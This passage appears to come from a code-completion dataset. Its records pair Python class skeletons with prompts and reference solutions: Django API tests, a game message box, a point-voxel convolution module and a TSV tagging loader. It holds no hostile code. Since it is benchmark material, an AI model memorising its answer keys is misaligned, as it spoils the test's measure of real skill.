self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "revision_id": "3de0f8eeb4dbf9ec37b17ece0dde51c9e0f381ac", "skeleton": "<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n\n def 
test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n", "source": "the_stack_v2_python_sparse", "source_path": "education_django/education_app/test_api.py", "source_repo": "ilyaignatyev/python-web-otus-ru", "split": "test", "star_events_count": 0} {"blob_id": "09a1d9ce4b8b9c63666f9c5a1cc054d94e08d07c", "bodies": ["super().__init__(transparent=True)\nself._on_ok = on_ok\nself._on_cancel = on_cancel\nself._panel = Compound()\nself._panel.add_widget(panel_widget)\n_panel_size = panel_widget.get_size(engine)\nwindow_size = engine.get_window_size()\n_panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\nself.add_widget(_panel_topleft, self._panel)\nself._panel.add_widget(panel_widget)\nself._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))", "if control_name == 'escape':\n if self._on_cancel:\n 
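# run the caller-supplied cancel callback before the box closes\n        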
self._on_cancel()\n raise self.Finished()\nelif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\nreturn super().update(control_name)"], "bodies_text": "<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n<|end_body_1|>\n", "class_docstring": "Displays message and requires answer or confirmation.", "class_name": "MessageBox", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000158", "length_bytes": 16213, "license_type": "permissive", "methods": [{"docstring": "Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. 
They will be called upon corresponding user reaction.", "name": "__init__", "signature": "def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None)"}, {"docstring": "Controls: - , : OK - : Cancel", "name": "update", "signature": "def update(self, control_name)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002730", "prompt": "Implement the Python class `MessageBox` described below.\n\nClass description:\nDisplays message and requires answer or confirmation.\n\nMethod signatures and docstrings:\n- def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None): Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\n- def update(self, control_name): Controls: - , : OK - : Cancel", "prompted_full_text": "Implement the Python class `MessageBox` described below.\n\nClass description:\nDisplays message and requires answer or confirmation.\n\nMethod signatures and docstrings:\n- def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None): Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\n- def update(self, control_name): Controls: - , : OK - : Cancel\n\n<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. 
They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n<|end_body_1|>\n", "revision_id": "584de7ad3e0817e28ee8e14e0298a06cae8e672e", "skeleton": "<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. 
They will be called upon corresponding user reaction.\"\"\"\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n", "source": "the_stack_v2_python_sparse", "source_path": "nanomyth/view/sdl/context.py", "source_repo": "clckwrkbdgr/nanomyth", "split": "test", "star_events_count": 0} {"blob_id": "d9e557ec3e189281715e55d81fa18c5f3dcfe623", "bodies": ["super().__init__()\nself.in_channels = in_channels\nself.out_channels = out_channels\nself.kernel_size = kernel_size\nself.resolution = resolution\nself.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\nvoxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\nif with_se:\n voxel_layers.append(SE3d(out_channels))\nself.voxel_layers = nn.Sequential(*voxel_layers)\nself.point_features = SharedMLP(in_channels, out_channels)", "features, coords = inputs\nvoxel_features, voxel_coords = self.voxelization(features, coords)\nvoxel_features = self.voxel_layers(voxel_features)\nvoxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\nfused_features = voxel_features + self.point_features(features)\nreturn (fused_features, coords)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "class_docstring": "Point Voxel Convolution module. 
Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.", "class_name": "PVConv", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000159", "length_bytes": 22879, "license_type": "permissive", "methods": [{"docstring": "Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.", "name": "__init__", "signature": "def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06)"}, {"docstring": "Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.", "name": "forward", "signature": "def forward(self, inputs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006981", "prompt": "Implement the Python class `PVConv` described below.\n\nClass description:\nPoint Voxel Convolution module. 
Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06): Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\n- def forward(self, inputs): Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.", "prompted_full_text": "Implement the Python class `PVConv` described below.\n\nClass description:\nPoint Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06): Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\n- def forward(self, inputs): Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\n\n<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. 
Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "revision_id": "51482281dc180786e7563c73c12ac5df89289748", "skeleton": "<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. 
eps: Epsilon for voxelization.\"\"\"\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n", "source": "the_stack_v2_python_sparse", "source_path": "ml3d/torch/models/pvcnn.py", "source_repo": "CosmosHua/Open3D-ML", "split": "test", "star_events_count": 0} {"blob_id": "c2e41376db9878a7231a2d01be4ef762e84374fc", "bodies": ["self.char_level = char_level\nself.hard_constraint = hard_constraint\nself.sent_delimiter = sent_delimiter\nself.max_seq_len = max_seq_len\nsuper().__init__(data, transform, cache, generate_idx)", "filepath = get_resource(filepath)\nfor words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}"], "bodies_text": "<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TSVTaggingDataset", "detected_licenses": ["Apache-2.0", "CC-BY-NC-SA-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). 
cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000160", "length_bytes": 3588, "license_type": "permissive", "methods": [{"docstring": "Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for", "name": "__init__", "signature": "def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None"}, {"docstring": "Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. 
code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O", "name": "load_file", "signature": "def load_file(self, filepath)"}], "n_methods": 2, "prompt": "Implement the Python class `TSVTaggingDataset` described below.\n\nClass description:\nImplement the TSVTaggingDataset class.\n\nMethod signatures and docstrings:\n- def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None: Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\n- def load_file(self, filepath): Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O", "prompted_full_text": "Implement the Python class `TSVTaggingDataset` described below.\n\nClass description:\nImplement the TSVTaggingDataset class.\n\nMethod signatures and docstrings:\n- def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None: Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: 